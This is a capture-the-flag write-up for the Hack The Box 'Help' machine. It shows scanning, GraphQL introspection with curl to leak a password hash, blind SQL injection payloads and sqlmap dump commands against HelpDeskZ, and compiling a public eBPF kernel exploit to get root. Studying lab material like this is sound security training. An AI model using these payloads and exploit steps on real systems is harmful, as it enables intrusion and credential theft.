> For the complete documentation index, see [llms.txt](https://anuragtaparia.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://anuragtaparia.gitbook.io/write-ups/linux/htb-or-help.md).

# HTB | Help

This is the Box on [Hack The Box Linux Privilege Escalation 101 Track](https://app.hackthebox.com/tracks/Linux-Privilege-Escalation-101). Find the box [here](https://app.hackthebox.com/machines/170).&#x20;

#### Skill Learned

* GraphQL enumeration&#x20;
* Blind SQL injection

## NMAP

IP: **10.10.10.121**

```
nmap -sT -p- --min-rate 10000 10.10.10.121
```

<figure><img src="/files/GSgXHzebzB9WfUBF4SSB" alt=""><figcaption></figcaption></figure>

```
nmap -sC -sV -p 22,80,3000 10.10.10.121
```

<figure><img src="/files/fLXw7MKBmmzlFzBuM8k7" alt=""><figcaption><p>nmap scan</p></figcaption></figure>

### Port 80

Let's visit port 80

<figure><img src="/files/vL2M1xnyzIksSmfe7IaH" alt=""><figcaption><p>port 80</p></figcaption></figure>

```
dirsearch -u http://help.htb/ -x 403,404
```

<figure><img src="/files/ChSH9vXL8fO5nnshIqqx" alt=""><figcaption><p>dirsearch</p></figcaption></figure>

<figure><img src="/files/bZHIcprFrsuRpgjUEQku" alt=""><figcaption><p>/support/</p></figcaption></figure>

```
searchsploit helpdeskz
```

<figure><img src="/files/vDHVfp5liOWnrnRgVnP3" alt=""><figcaption><p>searchsploit helpdeskz</p></figcaption></figure>

found arbitrary file upload

`searchsploit -m php/webapps/40300.py` to copy the exploit

Exploit requires us to upload a PHP shell file, but it is not allowed

<figure><img src="/files/0Ws0cBnFadbkygP4Ar9c" alt=""><figcaption></figcaption></figure>

i tried php,php3,php5,phtml but no luck&#x20;

Let's look at port 3000

### Port 3000

This port hosts an HTTP API. On visiting the root, there’s a message about credentials with the correct query

<figure><img src="/files/mxFCjgcCuq5vaY5iU3YD" alt=""><figcaption><p>port 3000</p></figcaption></figure>

#### GraphQL

Looking at the response headers, I see it’s powered by Express:

<figure><img src="/files/ZjrMYch891L4JqFZijA0" alt=""><figcaption><p>port 3000</p></figcaption></figure>

Looking around on Google led me to [GraphQL](https://graphql.org/), a query language designed for APIs. When I tried paths that didn’t exist, I got this message:

<figure><img src="/files/RWkX7zf3yXhVUVQpsumg" alt=""><figcaption><p>/test</p></figcaption></figure>

But when I tried /graphql, I got:

<figure><img src="/files/gtWOznSKP3vNg79frMDd" alt=""><figcaption><p>/graphql</p></figcaption></figure>

This [article](https://graphql.org/learn/introspection/) is a useful guide to enumerating a GraphQL instance. This [post](https://www.apollographql.com/blog/4-simple-ways-to-call-a-graphql-api#2-curl) was useful to figure out how to interact with GraphQL with curl.

I’ll switch to curl here to hit the API. `-s` will silence the progress bar. `-H "Content-Type: application/json"` is necessary for the API to handle the JSON data. Then I’ll use `-d '{ "query": "[query]" }'` it to send the query. Finally, I’ll use `jq` to pretty print the results.

First I’ll get the fields from the schema:&#x20;

```
curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { queryType { name, fields { name, description } } } }" }' | jq -c .
```

<figure><img src="/files/wECcX4Dgzx0yqnWeY8nt" alt=""><figcaption></figcaption></figure>

I’ll also get the types of User, String, etc:

```
curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq .
```

<figure><img src="/files/3fPd96QlbCstR8EYmfEA" alt=""><figcaption></figcaption></figure>

I’ll get the fields associated with the User type:

```
curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: "User") { name fields { name } } }" }' | jq .
```

<figure><img src="/files/iyzUVoDco4FOTWAPiioy" alt=""><figcaption></figcaption></figure>

I'll try to get values

```
curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq .
```

<figure><img src="/files/Rnv723OYaOVlPINSE0lh" alt=""><figcaption></figcaption></figure>

from [crackstation](https://crackstation.net/) we got the value.

<figure><img src="/files/R2iWiG0DpfeE4u1CIXVN" alt=""><figcaption></figcaption></figure>

Now let's try to login to portal

and we are in portal

<figure><img src="/files/WdAWzLrVcZzcQycgbpVT" alt=""><figcaption></figcaption></figure>

## Foothold/shell

I tried submitting the ticket with the attachment test.txt. On submitting, I could see my ticket:

<figure><img src="/files/pDsW1aVLDPaQiGBUwU9O" alt=""><figcaption></figcaption></figure>

The link to the attachment is: `http://help.htb/support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6` If I visit the link I file gets download

The SQLi in the last param. If I add `' AND 1=1-- -'` the file gets downloaded and If I add `' AND 1=2-- -'` I get the below error page

<figure><img src="/files/XZBi6u2jCmRhHO1u86oH" alt=""><figcaption></figcaption></figure>

That’s a blind injection. I can pass some tests in, and get true (downloaded attachment) or false (Whoops!) back.

#### SQLMAP

save the request to a text file and run sqlmap

```
sqlmap -r req.txt --level 5 --risk 3 -p param[]
```

<figure><img src="/files/5u6nMVpy4ApxNRlW2Yve" alt=""><figcaption></figcaption></figure>

I’ve got the injection. Now I’ll run with --dump. One table that looks interesting is:&#x20;

```
sqlmap -r req.txt --level 5 --dump
```

we have found the password

<figure><img src="/files/7HzwAwvia1mYnqoZotQs" alt=""><figcaption><p>sql table</p></figcaption></figure>

let's try to ssh via this

and we are in and found user.txt

<figure><img src="/files/cnciQDEvUhm1wotew97E" alt=""><figcaption><p>user.txt</p></figcaption></figure>

## Priv Esc

Let's copy [linux-exploit-suggester.sh](https://github.com/The-Z-Labs/linux-exploit-suggester) to box.

we got many exploits. Let's start with \[CVE-2017-16995] [eBPF\_verifier](https://www.exploit-db.com/exploits/45010)

Let's copy the exploit to the box and run

```
gcc -o a 45010.c
./a
```

<figure><img src="/files/ww69s0DhbKJU81yprlz1" alt=""><figcaption><p>./a</p></figcaption></figure>

found **root.txt**

<figure><img src="/files/4qFRncofj8ekcHr1LdZM" alt=""><figcaption><p>root.txt</p></figcaption></figure>
